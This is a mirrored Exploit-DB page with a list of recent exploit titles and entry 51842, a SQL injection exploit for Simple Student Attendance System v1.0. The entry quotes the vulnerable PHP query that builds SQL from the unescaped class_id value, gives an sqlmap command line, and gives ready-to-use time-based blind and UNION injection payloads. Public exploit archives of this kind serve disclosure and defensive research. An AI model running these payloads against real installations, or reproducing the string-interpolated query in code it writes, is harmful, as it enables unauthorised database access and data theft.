bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/remote/51842.txt
Exploit-DB 7ef8e488d8 DB: 2024-03-04 
22 changes to exploits/shellcodes/ghdb

GL.iNet AR300M v3.216 Remote Code Execution - CVE-2023-46456 Exploit
GL.iNet AR300M v4.3.7 Arbitrary File Read - CVE-2023-46455 Exploit
GL.iNet AR300M v4.3.7 Remote Code Execution - CVE-2023-46454 Exploit

Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated)

R Radio Network FM Transmitter 1.07 system.cgi - Password Disclosure

TitanNit Web Control 2.01 / Atemio 7600 - Root Remote Code Execution

TPC-110W - Missing Authentication for Critical Function

A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc

Easywall 0.3.1 - Authenticated Remote Command Execution

Magento ver. 2.4.6 - XSLT Server Side Injection

AC Repair and Services System v1.0 - Multiple SQL Injection

Enrollment System v1.0 - SQL Injection
Petrol Pump Management Software v.1.0 - SQL Injection
Petrol Pump Management Software v.1.0 - Stored Cross Site Scripting via SVG file
Petrol Pump Management Software v1.0 - 'Address' Stored Cross Site Scripting
Petrol Pump Management Software v1.0 - Remote Code Execution via File Upload

Real Estate Management System v1.0 - Remote Code Execution via File Upload
Simple Student Attendance System v1.0 -  'classid' Time Based Blind & Union Based SQL Injection
Simple Student Attendance System v1.0 - Time Based Blind SQL Injection

Boss Mini 1.4.0 - local file inclusion

Windows PowerShell - Event Log Bypass Single Quote Code Execution
2024-03-04 00:16:34 +00:00

33 lines
No EOL
1.8 KiB
Text
Raw Blame History

# Exploit Title: Simple Student Attendance System v1.0 - 'classid' Time Based Blind & Union Based SQL Injection
# Date: 26 December 2023
# Exploit Author: Gnanaraj Mauviel (@0xm3m)
# Vendor: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/17018/simple-student-attendance-system-using-php-and-mysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-attendance.zip
# Version: v1.0
# Tested on: Mac OSX, XAMPP, Apache, MySQL
-------------------------------------------------------------------------------------------------------------------------------------------
Source Code(/php-attendance/classes/actions.class.php):
public function attendanceStudents($class_id = "", $class_date = ""){
if(empty($class_id) || empty($class_date))
return [];
$sql = "SELECT `students_tbl`.*, COALESCE((SELECT `status` FROM `attendance_tbl` where `student_id` = `students_tbl`.id and `class_date` = '{$class_date}' ), 0) as `status` FROM `students_tbl` where `class_id` = '{$class_id}' order by `name` ASC";
$qry = $this->conn->query($sql);
$result = $qry->fetch_all(MYSQLI_ASSOC);
return $result;
}
-> sqlmap -u "http://localhost/php-attendance/?page=attendance&class_id=446&class_date=0002-02-20" --batch
---
Parameter: class_id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=attendance&class_id=446' AND (SELECT 5283 FROM (SELECT(SLEEP(5)))zsWT) AND 'nqTi'='nqTi&class_date=0002-02-20
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: page=attendance&class_id=446' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171717671,0x7154766a5453645a7a4d497071786a6f4b647a5a6d4162756c72636b4a4555746d555a5a71614d4c,0x71767a7a71),NULL-- -&class_date=0002-02-20
---
Reference in a new issue View git blame Copy permalink